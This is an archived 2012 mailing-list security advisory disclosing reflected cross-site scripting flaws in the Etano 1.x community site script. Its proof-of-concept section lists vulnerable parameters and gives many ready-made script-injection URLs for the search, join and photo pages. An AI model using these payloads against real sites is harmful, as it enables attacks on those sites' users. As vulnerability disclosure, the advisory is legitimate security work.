Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 6 Mar 2012 00:55:03 +0800
From: YGN Ethical Hacker Group <lists@...g.net>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>, bugtraq <bugtraq@...urityfocus.com>, 
	secalert@...urityreason.com, bugs@...uritytracker.com, 
	vuln <vuln@...unia.com>, vuln@...urity.nnov.ru, news@...uriteam.com, 
	moderators@...db.org, submissions@...ketstormsecurity.org, 
	submit@...ecurity.com, oss-security@...ts.openwall.com
Subject: Etano 1.x <= Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW

Etano 1.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

The community builder script we provide - Etano - was built entirely
based on requests from customers of our previous dating package
(Dating Site Builder). Almost every feature ever requested was built
into Etano to help you build a better site for your community members.
You can use Etano to start up a dating site, a social networking site,
a classifieds site or any other type of site involving groups of
people, companies, products.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission to
join.php, search.php, photo_search.php and photo_view.php , which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

Tested in 1.x versions (1.20-1.22)


5. PROOF-OF-CONCEPT/EXPLOIT

URL: http://localhost/etano/join.php
Method: POST
Vulnerable Parameters: user, email, email2, f17_zip, agree

------------------------------------------------------------------------------------------------

URL: http://localhost/etano/search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, f17_city,f17_country ,
f17_state, f17_zip, f19, wphoto, search, v, return


http://localhost/etano/search.php?'"><script>alert(/XSS/)</script>

http://localhost/etano/search.php?st='"><script>alert(/XSS/)</script>

http://localhost/etano/search.php?f17_city='"><script>alert(/XSS/)</script>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country='"><script>alert(/XSS/)</script>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state='"><script>alert(/XSS/)</script>&f17_zip=3&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='"><script>alert(/XSS/)</script>&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='"><script>alert(/XSS/)</script>&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='"><script>alert(/XSS/)</script>&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='"><script>alert(/XSS/)</script>

http://localhost/etano/search.php?search='"><script>alert(/XSS/)</script>&v=g

http://localhost/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='"><script>alert(/XSS/)</script>

http://localhost/etano/search.php?st=xss"><script>alert(/XSS/)</script>&user=unknown

------------------------------------------------------------------------------------------------

URL: http://localhost/etano/photo_search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, return

http://localhost/etano/photo_search.php?'"><script>alert(/XSS/)</script>

http://localhost/etano/photo_search.php?st='"><script>alert(/XSS/)</script>

------------------------------------------------------------------------------------------------

URL: http://localhost/etano/photo_view.php
Method: GET
Vulnerable Parameter: return

http://localhost/etano/photo_view.php?photo_id=1&return="><script>alert(/XSS/)</script>


6. SOLUTION

The vendor hasn't released the fixed yet.


7. VENDOR

Datemill
http://www.datemill.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-21: notified vendor
2012-03-05: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss


#yehg [2012-03-05]

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.